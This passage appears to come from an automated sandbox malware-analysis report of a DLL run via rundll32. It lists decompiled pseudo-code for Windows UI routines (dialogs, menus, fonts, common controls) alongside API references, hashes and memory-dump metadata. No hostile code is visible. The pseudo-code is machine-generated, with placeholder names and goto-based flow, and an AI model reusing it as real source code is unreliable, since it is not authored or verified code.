                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 634650903-2766943729
                                                                                                            • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                                                            • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F0D1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001F0D1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t74;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				int _t96;
				signed int _t97;
				intOrPtr* _t107;
				signed int _t116;
				signed int _t135;
				DLGTEMPLATE* _t136;
				struct HWND__* _t138;
				void* _t139;
				void* _t141;

				_t109 = __ecx;
				E10011BF0(0x1003a3de, _t139);
				_t107 = __ecx;
				 *((intOrPtr*)(_t139 - 0x10)) = _t141 - 0x3c;
				 *((intOrPtr*)(_t139 - 0x20)) = __ecx;
				if( *(_t139 + 0x10) == 0) {
					 *(_t139 + 0x10) =  *(E100373B5() + 0xc);
				}
				_t135 =  *(E100373B5() + 0x1038);
				 *(_t139 - 0x28) = _t135;
				 *(_t139 - 0x14) = 0;
				 *((intOrPtr*)(_t139 - 0x24)) = 0;
				 *(_t139 - 4) = 0;
				E10021D47(_t109, 0x10);
				E10021D47(_t109, 0x7c000);
				if(_t135 == 0) {
					_t136 =  *(_t139 + 8);
					L7:
					__eflags = _t136;
					if(__eflags == 0) {
						L4:
						_t67 = 0;
						L32:
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0xc));
						return _t67;
					}
					_t68 = E100243B2();
					_t129 =  *_t68;
					 *((intOrPtr*)(_t139 - 0x1c)) =  *((intOrPtr*)( *_t68 + 0xc))() + 0x10;
					 *(_t139 - 4) = 1;
					 *((intOrPtr*)(_t139 - 0x18)) = 0;
					__eflags = E10024A3D(_t107, 0, __eflags, _t136, _t139 - 0x1c, _t139 - 0x18);
					__eflags =  *0x1004efe4; // 0x0
					_t74 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t74;
						if(_t74 == 0) {
							L17:
							 *(_t107 + 0x40) =  *(_t107 + 0x40) | 0xffffffff;
							 *(_t107 + 0x38) =  *(_t107 + 0x38) | 0x00000010;
							_push(_t107);
							E100237EE();
							_t76 =  *(_t139 + 0xc);
							__eflags = _t76;
							if(_t76 != 0) {
								_t77 =  *(_t76 + 0x1c);
							} else {
								_t77 = 0;
							}
							_t138 = CreateDialogIndirectParamA( *(_t139 + 0x10), _t136, _t77, E1001EB68, 0);
							E100014B0( *((intOrPtr*)(_t139 - 0x1c)) + 0xfffffff0, _t129);
							_t116 =  *(_t139 - 0x28);
							 *(_t139 - 4) =  *(_t139 - 4) | 0xffffffff;
							__eflags = _t116;
							if(_t116 != 0) {
								 *((intOrPtr*)( *_t116 + 0x14))(_t139 - 0x48);
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)( *_t107 + 0x12c))(0);
								}
							}
							_t80 = E10022196();
							__eflags = _t80;
							if(_t80 == 0) {
								 *((intOrPtr*)( *_t107 + 0x114))();
							}
							__eflags = _t138;
							if(_t138 != 0) {
								__eflags =  *(_t107 + 0x38) & 0x00000010;
								if(( *(_t107 + 0x38) & 0x00000010) == 0) {
									DestroyWindow(_t138);
									_t138 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t139 - 0x14);
							if( *(_t139 - 0x14) != 0) {
								GlobalUnlock( *(_t139 - 0x14));
								GlobalFree( *(_t139 - 0x14));
							}
							__eflags = _t138;
							_t60 = _t138 != 0;
							__eflags = _t60;
							_t67 = 0 | _t60;
							goto L32;
						}
						L15:
						E10024A0E(_t139 - 0x38, _t136);
						 *(_t139 - 4) = 2;
						E10024970(_t107, _t139 - 0x38, 0, _t136,  *((intOrPtr*)(_t139 - 0x18)));
						 *(_t139 - 0x14) = E10024724(_t139 - 0x38);
						 *(_t139 - 4) = 1;
						E10024716(_t139 - 0x38);
						__eflags =  *(_t139 - 0x14);
						if( *(_t139 - 0x14) != 0) {
							_t136 = GlobalLock( *(_t139 - 0x14));
						}
						goto L17;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L15;
					}
					_t96 = GetSystemMetrics(0x2a);
					__eflags = _t96;
					if(_t96 == 0) {
						goto L17;
					}
					_t97 = E10011CB0(_t107, 0,  *((intOrPtr*)(_t139 - 0x1c)), "MS Shell Dlg");
					asm("sbb al, al");
					_t74 =  ~_t97 + 0x00000001 & 0x000000ff;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t139 - 0x18)) - 8;
					if( *((short*)(_t139 - 0x18)) == 8) {
						 *((intOrPtr*)(_t139 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t139 - 0x48);
				if( *((intOrPtr*)( *_t107 + 0x12c))() != 0) {
					_t136 =  *((intOrPtr*)( *_t135 + 0x10))(_t139 - 0x48,  *(_t139 + 8));
					goto L7;
				}
				goto L4;
			}





















                                                                                                            0x1001f0d1
                                                                                                            0x1001f0d6
                                                                                                            0x1001f0e6
                                                                                                            0x1001f0e8
                                                                                                            0x1001f0eb
                                                                                                            0x1001f0ee
                                                                                                            0x1001f0f8
                                                                                                            0x1001f0f8
                                                                                                            0x1001f100
                                                                                                            0x1001f108
                                                                                                            0x1001f10b
                                                                                                            0x1001f10e
                                                                                                            0x1001f111
                                                                                                            0x1001f114
                                                                                                            0x1001f11e
                                                                                                            0x1001f125
                                                                                                            0x1001f152
                                                                                                            0x1001f155
                                                                                                            0x1001f155
                                                                                                            0x1001f157
                                                                                                            0x1001f139
                                                                                                            0x1001f139
                                                                                                            0x1001f2cd
                                                                                                            0x1001f2d2
                                                                                                            0x1001f2db
                                                                                                            0x1001f2db
                                                                                                            0x1001f159
                                                                                                            0x1001f15e
                                                                                                            0x1001f168
                                                                                                            0x1001f174
                                                                                                            0x1001f178
                                                                                                            0x1001f185
                                                                                                            0x1001f18a
                                                                                                            0x1001f190
                                                                                                            0x1001f192
                                                                                                            0x1001f1ca
                                                                                                            0x1001f1ca
                                                                                                            0x1001f1cc
                                                                                                            0x1001f20d
                                                                                                            0x1001f20d
                                                                                                            0x1001f211
                                                                                                            0x1001f215
                                                                                                            0x1001f216
                                                                                                            0x1001f21b
                                                                                                            0x1001f21e
                                                                                                            0x1001f220
                                                                                                            0x1001f226
                                                                                                            0x1001f222
                                                                                                            0x1001f222
                                                                                                            0x1001f222
                                                                                                            0x1001f240
                                                                                                            0x1001f242
                                                                                                            0x1001f266
                                                                                                            0x1001f269
                                                                                                            0x1001f26d
                                                                                                            0x1001f26f
                                                                                                            0x1001f277
                                                                                                            0x1001f27a
                                                                                                            0x1001f27c
                                                                                                            0x1001f283
                                                                                                            0x1001f283
                                                                                                            0x1001f27c
                                                                                                            0x1001f289
                                                                                                            0x1001f28e
                                                                                                            0x1001f290
                                                                                                            0x1001f296
                                                                                                            0x1001f296
                                                                                                            0x1001f29c
                                                                                                            0x1001f29e
                                                                                                            0x1001f2a0
                                                                                                            0x1001f2a4
                                                                                                            0x1001f2a7
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2ad
                                                                                                            0x1001f2a4
                                                                                                            0x1001f2af
                                                                                                            0x1001f2b2
                                                                                                            0x1001f2b7
                                                                                                            0x1001f2c0
                                                                                                            0x1001f2c0
                                                                                                            0x1001f2c8
                                                                                                            0x1001f2ca
                                                                                                            0x1001f2ca
                                                                                                            0x1001f2ca
                                                                                                            0x00000000
                                                                                                            0x1001f2ca
                                                                                                            0x1001f1ce
                                                                                                            0x1001f1d2
                                                                                                            0x1001f1dd
                                                                                                            0x1001f1e1
                                                                                                            0x1001f1f1
                                                                                                            0x1001f1f4
                                                                                                            0x1001f1f8
                                                                                                            0x1001f1fd
                                                                                                            0x1001f200
                                                                                                            0x1001f20b
                                                                                                            0x1001f20b
                                                                                                            0x00000000
                                                                                                            0x1001f200
                                                                                                            0x1001f194
                                                                                                            0x1001f196
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f19a
                                                                                                            0x1001f1a0
                                                                                                            0x1001f1a2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f1ac
                                                                                                            0x1001f1b3
                                                                                                            0x1001f1b7
                                                                                                            0x1001f1ba
                                                                                                            0x1001f1be
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001f1c0
                                                                                                            0x1001f1c5
                                                                                                            0x1001f1c7
                                                                                                            0x1001f1c7
                                                                                                            0x00000000
                                                                                                            0x1001f1c5
                                                                                                            0x1001f12c
                                                                                                            0x1001f137
                                                                                                            0x1001f14e
                                                                                                            0x00000000
                                                                                                            0x1001f14e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1001F0D6
                                                                                                            • GetSystemMetrics.USER32 ref: 1001F19A
                                                                                                            • GlobalLock.KERNEL32 ref: 1001F205
                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB68,00000000), ref: 1001F234
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 2364537584-76309092
                                                                                                            • Opcode ID: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction ID: 46954fd45d3ebabc0cd1c103719a3d91ff65dea30fed852b23a269951fd2c375
                                                                                                            • Opcode Fuzzy Hash: c69abc20a306ad5bf7d68b9a9b0dbb7d6744ee1315ae104d5c5fc3f7b317a7db
                                                                                                            • Instruction Fuzzy Hash: A951AE35900209DFCB11DFA4D8859FEBBB5EF54350F21466AF456EB292DB309E80CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10023123 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E10023123(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10023092(__ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1002040A(_t41);
						L11:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L12;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x1c);
							_v8 = GetFocus();
							E100220EE(_t44, SetActiveWindow( *(_t41 + 0x1c)));
							SendMessageA( *(_t41 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}
















                                                                                                            0x10023123
                                                                                                            0x10023126
                                                                                                            0x10023129
                                                                                                            0x1002312b
                                                                                                            0x10023133
                                                                                                            0x10023139
                                                                                                            0x1002313d
                                                                                                            0x10023142
                                                                                                            0x100231c9
                                                                                                            0x100231ce
                                                                                                            0x100231dd
                                                                                                            0x100231dd
                                                                                                            0x00000000
                                                                                                            0x100231d4
                                                                                                            0x100231d6
                                                                                                            0x100231c4
                                                                                                            0x100231c6
                                                                                                            0x100231df
                                                                                                            0x100231e2
                                                                                                            0x100231e2
                                                                                                            0x100231ce
                                                                                                            0x10023148
                                                                                                            0x1002314b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002314d
                                                                                                            0x10023150
                                                                                                            0x10023163
                                                                                                            0x1002316d
                                                                                                            0x1002316f
                                                                                                            0x10023170
                                                                                                            0x10023182
                                                                                                            0x10023188
                                                                                                            0x1002319b
                                                                                                            0x100231ac
                                                                                                            0x100231af
                                                                                                            0x100231af
                                                                                                            0x100231b9
                                                                                                            0x100231be
                                                                                                            0x100231be
                                                                                                            0x100231b9
                                                                                                            0x1002316d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ActiveFocus$MessageSend
                                                                                                            • String ID: u
                                                                                                            • API String ID: 1556911595-4067256894
                                                                                                            • Opcode ID: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction ID: 4dd9d1b88c5e5c3b3a68c724072b9ea331201f72bd5375ef8a8f6a79988825c8
                                                                                                            • Opcode Fuzzy Hash: 7a38ecf18f7e197d870a7535b5f32c12f4dd9d2fa5cbbccc8e8d05b671b4452a
                                                                                                            • Instruction Fuzzy Hash: 53113832A0021DBFDB21DF75EC4595E7BA4EF41390B80C822ED02D61A6DA34ED60CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024970 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10024970(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x1004c470; // 0x6edecb8c
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E100117AE(E10024838(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}












                                                                                                            0x10024976
                                                                                                            0x1002497d
                                                                                                            0x10024986
                                                                                                            0x10024989
                                                                                                            0x1002498c
                                                                                                            0x1002498f
                                                                                                            0x10024994
                                                                                                            0x10024998
                                                                                                            0x100249a2
                                                                                                            0x100249b1
                                                                                                            0x100249b5
                                                                                                            0x100249c2
                                                                                                            0x100249c4
                                                                                                            0x100249c6
                                                                                                            0x100249c6
                                                                                                            0x100249e1
                                                                                                            0x100249e3
                                                                                                            0x100249e3
                                                                                                            0x100249e9
                                                                                                            0x100249ee
                                                                                                            0x100249f0
                                                                                                            0x100249f0
                                                                                                            0x10024a0b
                                                                                                            0x10024a0b
                                                                                                            0x1002499c
                                                                                                            0x100249a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStockObject.GDI32(00000011), ref: 10024994
                                                                                                            • GetStockObject.GDI32(0000000D), ref: 1002499C
                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 100249A9
                                                                                                            • GetDC.USER32(00000000), ref: 100249B8
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 100249CC
                                                                                                            • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100249D8
                                                                                                            • ReleaseDC.USER32 ref: 100249E3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction ID: 93baf42c8ba0638d3e86fd25d7fd089804823e0dcc4687e6d17ef0450da081f3
                                                                                                            • Opcode Fuzzy Hash: 663ff432d419aabd0504d210e2fefc42dda8f2058b6cb29df90b3376245dff4c
                                                                                                            • Instruction Fuzzy Hash: F5114F31A40228EFEB01DBA1DD85FAE7BB8FB45785F410019F605EA191DBB49D42CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002155E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 40%
                                                                                                            			E1002155E(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}









                                                                                                            0x10021561
                                                                                                            0x1002156e
                                                                                                            0x10021570
                                                                                                            0x10021576
                                                                                                            0x1002157a
                                                                                                            0x100215d3
                                                                                                            0x1002157c
                                                                                                            0x10021582
                                                                                                            0x10021584
                                                                                                            0x1002158c
                                                                                                            0x100215a9
                                                                                                            0x100215b1
                                                                                                            0x100215b5
                                                                                                            0x100215b9
                                                                                                            0x100215bb
                                                                                                            0x100215c1
                                                                                                            0x100215c1
                                                                                                            0x100215b9
                                                                                                            0x1002158e
                                                                                                            0x1002159d
                                                                                                            0x1002159f
                                                                                                            0x100215a5
                                                                                                            0x100215a5
                                                                                                            0x1002159d
                                                                                                            0x100215c8
                                                                                                            0x00000000
                                                                                                            0x100215ce

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,10021FE1,?,00040000), ref: 10021567
                                                                                                            • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 10021570
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 10021584
                                                                                                            • #17.COMCTL32 ref: 1002159F
                                                                                                            • #17.COMCTL32 ref: 100215BB
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 100215C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                            • String ID: COMCTL32.DLL$InitCommonControlsEx
                                                                                                            • API String ID: 1437655972-4218389149
                                                                                                            • Opcode ID: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                                                            • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                                                            • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

























                                                                                                            0x10032113
                                                                                                            0x10032118
                                                                                                            0x1003211b
                                                                                                            0x10032125
                                                                                                            0x1003212f
                                                                                                            0x10032132
                                                                                                            0x10032149
                                                                                                            0x1003214d
                                                                                                            0x10032152
                                                                                                            0x10032160
                                                                                                            0x10032174
                                                                                                            0x100321bd
                                                                                                            0x100321c0
                                                                                                            0x100321c6
                                                                                                            0x100321cc
                                                                                                            0x100321cf
                                                                                                            0x1003227f
                                                                                                            0x10032280
                                                                                                            0x00000000
                                                                                                            0x10032280
                                                                                                            0x100321db
                                                                                                            0x100321e1
                                                                                                            0x100321e5
                                                                                                            0x100321e8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100321f1
                                                                                                            0x1003221b
                                                                                                            0x10032223
                                                                                                            0x10032231
                                                                                                            0x1003222c
                                                                                                            0x1003222e
                                                                                                            0x1003222e
                                                                                                            0x10032233
                                                                                                            0x10032234
                                                                                                            0x10032237
                                                                                                            0x10032238
                                                                                                            0x10032240
                                                                                                            0x10032246
                                                                                                            0x1003224b
                                                                                                            0x1003226a
                                                                                                            0x1003226a
                                                                                                            0x1003226d
                                                                                                            0x00000000
                                                                                                            0x1003226d
                                                                                                            0x10032250
                                                                                                            0x10032265
                                                                                                            0x10032260
